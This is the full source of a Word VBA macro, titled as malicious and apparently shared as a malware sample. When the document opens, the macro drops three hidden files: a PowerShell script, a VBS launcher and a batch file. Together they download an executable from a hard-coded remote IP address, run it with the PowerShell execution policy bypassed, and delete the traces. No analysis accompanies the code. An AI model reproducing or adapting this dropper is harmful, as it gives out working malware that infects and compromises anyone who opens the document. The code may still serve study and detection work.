Malicious Word macro

1. Attribute VB_Name = "ThisDocument"
2. Attribute VB_Base = "1Normal.ThisDocument"
3. Attribute VB_GlobalNameSpace = False
4. Attribute VB_Creatable = False
5. Attribute VB_PredeclaredId = True
6. Attribute VB_Exposed = True
7. Attribute VB_TemplateDerived = True
8. Attribute VB_Customizable = True
9. Sub Auto_Open()
10.     h
11. End Sub
12. Sub h()
13. Dim MY_FILENDIR, MY_FILEDIR, MY_FILDIR
14.  MY_FILEN = "ntusersc.ps1"
15.  MY_FILE = "ntusersss.bat"
16.  MY_FIL = "ntuserskk.vbs"
17.      MY_FILENDIR = ActiveDocument.Path + "\ntusersc.ps1"
18.      MY_FILEDIR = ActiveDocument.Path + "\ntusersss.bat"
19.      MY_FILDIR = ActiveDocument.Path + "\ntuserskk.vbs"
20.      Dim FileNumber As Integer
21.      Dim FileNumb As Integer
22.      Dim FileNu As Integer
23.      Dim retVal As Variant
24.      FileNumber = FreeFile
25.      FileNumb = FreeFile
26.      FileNu = FreeFile
27.     Open MY_FILENDIR For Output As #FileNumber
28.     Print #FileNumber, "$hashroot = '13-93-8e-e9-b1-a3-63-63-ed-49-7f-43-3d-5c-a2-c2';"
29.     Print #FileNumber, "$hash = '0';"
30.     Print #FileNumber, "$down = New-Object System.Net.WebClient;"
31.     Print #FileNumber, "$url  = 'http://162.243.234.167:8080/gr/4.exe';"
32.     Print #FileNumber, "$file = 'crsss2.exe';"
33.     Print #FileNumber, "$down.DownloadFile($url,$file);"
34.     Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;"
35.     Print #FileNumber, "$someFilePath = $ScriptDir + 'crsss2.exe';"
36.     Print #FileNumber, "$vbsFilePath = $ScriptDir + 'ntuserskk.vbs';"
37.     Print #FileNumber, "$batFilePath = $ScriptDir + 'ntusersss.bat';"
38.     Print #FileNumber, "$psFilePath = $ScriptDir + 'ntusersc.ps1';"
39.     Print #FileNumber, "Do { Start-Sleep -s 10;"
40.     Print #FileNumber, "$md5 = New-Object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider;"
41.     Print #FileNumber, "$hash = [System.BitConverter]::ToString($md5.ComputeHash([System.IO.File]::ReadAllBytes($someFilePath))); }"
42.     Print #FileNumber, "Until ($hash -Match $hashroot);"
43.     Print #FileNumber, "cmd.exe /c crsss2.exe;"
44.     Print #FileNumber, "$file1 = gci $vbsFilePath -Force"
45.     Print #FileNumber, "$file2 = gci $batFilePath -Force"
46.     Print #FileNumber, "$file3 = gci $psFilePath -Force"
47.     Print #FileNumber, "$file1.Attributes = $file1.Attributes -bxor [System.IO.FileAttributes]::Hidden"
48.     Print #FileNumber, "$file2.Attributes = $file2.Attributes -bxor [System.IO.FileAttributes]::Hidden"
49.     Print #FileNumber, "$file3.Attributes = $file3.Attributes -bxor [System.IO.FileAttributes]::Hidden"
50.     Print #FileNumber, "If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }"
51.     Print #FileNumber, "If (Test-Path $batFilePath){ Remove-Item $batFilePath }"
52.     Print #FileNumber, "If (Test-Path $someFilePath){ Remove-Item $someFilePath }"
53.     Print #FileNumber, "Remove-Item $MyINvocation.InvocationName"
54.     Close #FileNumber
55.    
56.     Open MY_FILDIR For Output As #FileNumb
57.     Print #FileNumb, "currentDirectory = left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(len(WScript.ScriptName)))"
58.     Print #FileNumb, "Set objFSO=CreateObject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & ")"
59.     Print #FileNumb, "currentFile = currentDirectory & " & Chr(34) & "ntusersc.ps1" & Chr(34)
60.     Print #FileNumb, "Set objShell = CreateObject(" & Chr(34) & "Wscript.shell" & Chr(34) & ")"
61.     Print #FileNumb, "objShell.run " & Chr(34) & "powershell.exe -ExecutionPolicy bypass -noprofile -file " & Chr(34) & " & currentFile,0,true"
62.     Close #FileNumb
63.      
64.      'creat batch file
65.    Open MY_FILEDIR For Output As #FileNu
66.     Print #FileNu, "@echo off"
67.     Print #FileNu, "ping 1.1.2.2 -n 2"
68.     Print #FileNu, "cscript.exe " & ActiveDocument.Path & "\ntuserskk.vbs"
69.     Print #FileNu, "exit"
70.     Close #FileNu
71.        
72.     dir1 = Len(Dir(MY_FILENDIR))
73.     dir2 = Len(Dir(MY_FILEDIR))
74.     dir3 = Len(Dir(MY_FILDIR))
75.     SetAttr MY_FILENDIR, vbHidden
76.     SetAttr MY_FILEDIR, vbHidden
77.     SetAttr MY_FILDIR, vbHidden
78.    
79.     Do While dir1 = 0
80.     WaitFor (2)
81.     Loop
82.    
83.     Do While dir2 = 0
84.     WaitFor (2)
85.     Loop
86.    
87.     Do While dir3 = 0
88.     WaitFor (2)
89.     Loop
90.    
91.     'Shell "cmd.exe /k " + MY_FILEDIR
92.    
93.     retVal = Shell(MY_FILEDIR, 0)
94.    
95.    
96.      
97. End Sub
98. Sub WaitFor(NumOfSeconds As Long)
99. Dim SngSec As Long
100. SngSec = Timer + NumOfSeconds
101.  
102. Do While Timer < SngSec
103. DoEvents
104. Loop
105.  
106. End Sub
107.  
108. Sub AutoOpen()
109.     Auto_Open
110. End Sub
111. Sub Workbook_Open()
112.     Auto_Open
113. End Sub